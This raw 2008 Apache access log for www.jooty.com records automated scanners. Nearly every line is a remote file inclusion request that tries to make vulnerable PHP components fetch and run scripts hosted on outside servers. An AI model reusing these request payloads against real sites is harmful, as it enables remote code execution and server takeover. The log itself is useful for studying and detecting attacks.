200.199.75.194 - - [11/Oct/2008:06:35:32 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:06:35:32 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:35:39 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alb0z.freehostia.com/kosova.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jooty.com"
98.114.75.233 - - [11/Oct/2008:06:35:41 -0700] "GET /logs/access.log%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:06:35:54 -0700] "GET /logs/access_080919.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
193.254.241.12 - - [11/Oct/2008:06:36:10 -0700] "GET /?sourcedir=http://163.26.12.232/id/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.jooty.com"
193.254.241.12 - - [11/Oct/2008:06:36:10 -0700] "GET /logs/?sourcedir=http://163.26.12.232/id/id.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.79" "www.jooty.com"
193.254.241.12 - - [11/Oct/2008:06:36:10 -0700] "GET /logs/access.log/?sourcedir=http://163.26.12.232/id/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:36:25 -0700] "GET /logs/access.log/index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:36:47 -0700] "GET /logs/access_080926.log//poll/poll_ssi.php?include_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:36:47 -0700] "GET /logs/access_080926.log//poll/poll_ssi.php?include_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:36:48 -0700] "GET /poll/poll_ssi.php?include_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:36:48 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jooty.com"
62.149.228.44 - - [11/Oct/2008:06:36:48 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jooty.com"
62.149.228.44 - - [11/Oct/2008:06:36:48 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jooty.com"
80.190.202.150 - - [11/Oct/2008:06:36:48 -0700] "GET /poll/poll_ssi.php?include_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:36:48 -0700] "GET /logs//poll/poll_ssi.php?include_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:36:48 -0700] "GET /logs//poll/poll_ssi.php?include_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:36:55 -0700] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:36:55 -0700] "GET /logs/index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:37:47 -0700] "GET /logs/access_080922.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:37:47 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:37:47 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
193.254.241.12 - - [11/Oct/2008:06:37:50 -0700] "GET /logs/access.log/?sourcedir=http://163.26.12.232/id/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
193.254.241.12 - - [11/Oct/2008:06:37:50 -0700] "GET /?sourcedir=http://163.26.12.232/id/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.jooty.com"
193.254.241.12 - - [11/Oct/2008:06:37:50 -0700] "GET /logs/?sourcedir=http://163.26.12.232/id/id.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.79" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:38:00 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:38:00 -0700] "GET /logs/access_080923.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
213.194.159.144 - - [11/Oct/2008:06:38:03 -0700] "GET /logs/access.log/convert/mvcw.php?vwar_root=http://t00.cwc.tc/ide.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
213.194.159.144 - - [11/Oct/2008:06:38:03 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://t00.cwc.tc/ide.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
213.194.159.144 - - [11/Oct/2008:06:38:04 -0700] "GET /convert/mvcw.php?vwar_root=http://t00.cwc.tc/ide.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:38:25 -0700] "GET /logs/access_080928.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:38:25 -0700] "GET /logs/access_080928.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
193.254.241.12 - - [11/Oct/2008:06:38:28 -0700] "GET /logs/access.log%20/?sourcedir=http://163.26.12.232/id/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:39:01 -0700] "GET /logs/access_080923.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:39:11 -0700] "GET /logs/access_080928.log/index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:39:27 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:39:32 -0700] "GET /include/lib.inc.php?site_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:39:32 -0700] "GET /logs/include/lib.inc.php?site_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:06:39:48 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://www.geocities.com/kucluk_pamungkas/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:06:39:48 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.geocities.com/kucluk_pamungkas/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.199.75.194 - - [11/Oct/2008:06:39:51 -0700] "GET /include/lib.inc.php?site_path=http://www.geocities.com/kucluk_pamungkas/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:39:57 -0700] "GET /logs/access_080928.log//poll/poll_ssi.php?include_path=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:39:57 -0700] "GET /logs/access_080928.log//poll/poll_ssi.php?include_path=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:40:02 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:40:21 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alb0z.freehostia.com/kosova.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:41:17 -0700] "GET /logs/access_080822.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:43:40 -0700] "GET /logs/access.log//include/monitoring/engine/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jooty.com"
80.190.202.150 - - [11/Oct/2008:06:43:41 -0700] "GET /logs/access.log//include/monitoring/engine/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jooty.com"
80.190.202.150 - - [11/Oct/2008:06:43:41 -0700] "GET /include/monitoring/engine/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jooty.com"
80.190.202.150 - - [11/Oct/2008:06:43:41 -0700] "GET /include/monitoring/engine/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jooty.com"
80.190.202.150 - - [11/Oct/2008:06:43:42 -0700] "GET /logs//include/monitoring/engine/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jooty.com"
80.190.202.150 - - [11/Oct/2008:06:43:42 -0700] "GET /logs//include/monitoring/engine/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jooty.com"
200.11.67.242 - - [11/Oct/2008:06:44:12 -0700] "GET /logs/access_080928.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:44:12 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
200.11.67.242 - - [11/Oct/2008:06:44:12 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alb0z.freehostia.com/kosova.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:44:19 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:44:26 -0700] "GET /logs/access_080920.log//include/monitoring/engine/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:44:26 -0700] "GET /logs/access_080920.log//include/monitoring/engine/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:44:26 -0700] "GET /include/monitoring/engine/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:44:27 -0700] "GET /include/monitoring/engine/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:44:27 -0700] "GET /logs//include/monitoring/engine/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
80.190.202.150 - - [11/Oct/2008:06:44:27 -0700] "GET /logs//include/monitoring/engine/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:45:21 -0700] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:45:21 -0700] "GET /logs/access_080923.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:06:45:21 -0700] "GET /logs/access_080923.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:06:45:22 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:06:45:23 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:06:45:30 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
203.22.204.76 - - [11/Oct/2008:06:45:35 -0700] "GET /logs/access_080926.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.vanderheulgroup.com/phpbb2/images/smiles/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.jooty.com"
203.22.204.76 - - [11/Oct/2008:06:45:35 -0700] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.vanderheulgroup.com/phpbb2/images/smiles/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.jooty.com"
203.22.204.76 - - [11/Oct/2008:06:45:35 -0700] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.vanderheulgroup.com/phpbb2/images/smiles/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.jooty.com"
203.22.204.76 - - [11/Oct/2008:06:45:44 -0700] "GET /logs/access_080926.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.vanderheulgroup.com/phpbb2/images/smiles/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.jooty.com"
203.22.204.76 - - [11/Oct/2008:06:45:44 -0700] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.vanderheulgroup.com/phpbb2/images/smiles/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.jooty.com"
203.22.204.76 - - [11/Oct/2008:06:45:44 -0700] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.vanderheulgroup.com/phpbb2/images/smiles/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.jooty.com"
65.55.208.48 - - [11/Oct/2008:06:45:45 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.jooty.com"
65.55.208.48 - - [11/Oct/2008:06:45:48 -0700] "GET /logs/access_080918.log HTTP/1.1" 200 1179648 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:06:46:02 -0700] "GET /logs/access_080919.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:46:04 -0700] "GET /logs/access_080926.log//poll/poll_ssi.php?include_path=http://usiauctions.com/logo/chillum.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:46:04 -0700] "GET /logs/access_080926.log//poll/poll_ssi.php?include_path=http://usiauctions.com/logo/h00dr4p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:46:05 -0700] "GET /poll/poll_ssi.php?include_path=http://usiauctions.com/logo/chillum.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:46:06 -0700] "GET /poll/poll_ssi.php?include_path=http://usiauctions.com/logo/h00dr4p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:46:06 -0700] "GET /logs//poll/poll_ssi.php?include_path=http://usiauctions.com/logo/chillum.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:46:07 -0700] "GET /logs//poll/poll_ssi.php?include_path=http://usiauctions.com/logo/h00dr4p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:06:46:09 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://keyz.k2station.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:06:46:09 -0700] "GET /index.php?DOCUMENT_ROOT=http://keyz.k2station.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
219.85.63.226 - - [11/Oct/2008:06:46:09 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://keyz.k2station.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:46:14 -0700] "GET /logs/access_080919.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
98.210.195.32 - - [11/Oct/2008:06:46:56 -0700] "GET /logs/access.log%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://r00tcrew.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:46:56 -0700] "GET /logs/access_080926.log//includes/mailaccess/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:46:56 -0700] "GET /logs/access_080926.log//includes/mailaccess/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:46:57 -0700] "GET /includes/mailaccess/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:46:57 -0700] "GET /includes/mailaccess/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:46:57 -0700] "GET /logs//includes/mailaccess/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:46:57 -0700] "GET /logs//includes/mailaccess/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
65.55.208.48 - - [11/Oct/2008:06:48:01 -0700] "GET /logs/access_080922.log HTTP/1.1" 200 1245184 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.jooty.com"
67.18.151.242 - - [11/Oct/2008:06:48:16 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://zer0web.webcindario.com/v7id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jooty.com"
67.18.151.242 - - [11/Oct/2008:06:48:17 -0700] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://zer0web.webcindario.com/v7id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jooty.com"
62.149.228.44 - - [11/Oct/2008:06:48:27 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jooty.com"
62.149.228.44 - - [11/Oct/2008:06:48:27 -0700] "GET /logs/include/lib.inc.php?site_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jooty.com"
62.149.228.44 - - [11/Oct/2008:06:48:27 -0700] "GET /include/lib.inc.php?site_path=http://books.siteburg.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jooty.com"
212.241.179.137 - - [11/Oct/2008:06:49:17 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://keyz.k2station.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jooty.com"
83.64.132.254 - - [11/Oct/2008:06:49:40 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://keyz.k2station.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.jooty.com"
83.64.132.254 - - [11/Oct/2008:06:49:41 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://keyz.k2station.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:49:59 -0700] "GET /logs/access_080919.log//includes/mailaccess/errors.php?error=http://moop.moomoo.co.il/sdsdf.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
91.194.91.196 - - [11/Oct/2008:06:49:59 -0700] "GET /logs/access_080919.log//includes/mailaccess/errors.php?error=http://www.index2000.ro/uploadedbanners/pbot.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.jooty.com"
78.159.111.131 - - [11/Oct/2008:06:50:51 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://spam.mywebshopping.com/one.coms%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
78.159.111.131 - - [11/Oct/2008:06:50:51 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://spam.mywebshopping.com/one.coms%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
78.159.111.131 - - [11/Oct/2008:06:50:51 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://spam.mywebshopping.com/one.coms%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jooty.com"
77.221.130.16 - - [11/Oct/2008:06:50:57 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jooty.com"
77.221.130.16 - - [11/Oct/2008:06:50:57 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jooty.com"
77.221.130.16 - - [11/Oct/2008:06:50:58 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:06:51:06 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:06:51:07 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
121.170.11.100 - - [11/Oct/2008:06:51:07 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:52:13 -0700] "GET /logs/access_080914.log//include/monitoring/engine/errors.php?error=http://usiauctions.com/logo/chillum.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
193.188.66.6 - - [11/Oct/2008:06:52:13 -0700] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
193.188.66.6 - - [11/Oct/2008:06:52:14 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
218.106.254.18 - - [11/Oct/2008:06:52:14 -0700] "GET /logs/access_080914.log//include/monitoring/engine/errors.php?error=http://usiauctions.com/logo/h00dr4p.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jooty.com"
193.188.66.6 - - [11/Oct/2008:06:52:14 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sonstar.net/bbb/pro/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jooty.com"
